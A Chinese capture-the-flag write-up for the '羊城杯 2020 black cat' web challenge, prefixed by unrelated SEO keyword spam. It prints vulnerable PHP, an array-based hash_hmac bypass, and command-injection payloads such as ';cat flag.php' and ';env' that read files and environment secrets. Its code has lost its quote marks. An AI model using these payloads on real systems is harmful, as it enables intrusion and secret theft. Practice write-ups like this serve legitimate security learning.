阿里云网站建设程序,杭州产品推广服务公司,恢复被百度k网站 关键词收录,怎么看网站关键词密度[羊城杯 2020]black cat 1 解题流程1.1 第一步1.2 第二步1.3 第三步 1 解题流程
1.1 第一步
打开网站有首歌#xff0c;按F12也是提示听歌#xff0c;ctf-wscan扫描就flag.php下载歌#xff0c;用010打开#xff0c;发现有一段内容if(empty($_POST[Black-Cat-Sheriff]) |… [羊城杯 2020]black cat 1 解题流程1.1 第一步1.2 第二步1.3 第三步 1 解题流程
1.1 第一步
打开网站有首歌按F12也是提示听歌ctf-wscan扫描就flag.php下载歌用010打开发现有一段内容if(empty($_POST[Black-Cat-Sheriff]) || empty($_POST[One-ear])){die(Ë£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡);
}
$clandestine getenv(clandestine); //获取环境变量
if(isset($_POST[White-cat-monitor]))$clandestine hash_hmac(sha256, $_POST[White-cat-monitor], $clandestine);
$hh hash_hmac(sha256, $_POST[One-ear], $clandestine);
if($hh ! $_POST[Black-Cat-Sheriff]){die(ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£);
}
echo exec(nc.$_POST[One-ear]);1.2 第二步
这题要post这几个参数Black-Cat-Sheriff、One-ear、White-cat-monitor 这里有3个if首先第一个肯定绕过 第二个if里面存在hash_hmac函数只要我们传数组就能让盐是空即第一次加密的clandestine是空 第三个因为盐是空所以只有普通加密Black-Cat-Sheriff传对应加密结果就行 特性MD5、sha特性是无法识别数组只要是数组加密就会变成null所以White-cat-monitor采用数组绕过最后一个if判断编写一个脚本生成加密结果?php$hh hash_hmac(sha256,;cat flag.php, null);echo $hh;
?
结果04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6exec(‘nc’.) 这里拼接命令如果直接传cat flag.php会变成 exec(nc’cat flag.php)无法执行 只要是系统命令的执行可以通过;来拼接命令所以one-ear;cat flag.php exec(nc;cat flag.php)
1.3 第三步
我先用ls ls …/ ls /等都没结果考虑其他
?Black-Cat-Sheriff83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395One-ear;dirWhite-cat-monitor[]1 得到 Hei_Mao_Jing_Chang.mp3 flag.php index.php js scssBlack-Cat-Sheriff04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6One-ear;cat flag.phpWhite-cat-monitor[]1 得到 “GWHT{y0u_mu3t_py_atTentiou_!0_lt}”; 提交后发现这个flag是错的如果cat flag.php没出来就cat /flag或者env Black-Cat-Sheriffafd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791bOne-ear;envWhite-cat-monitor[]1 得到FLAGflag{e325e53c-76d2-40b8-a41a-4dd88185afdb}
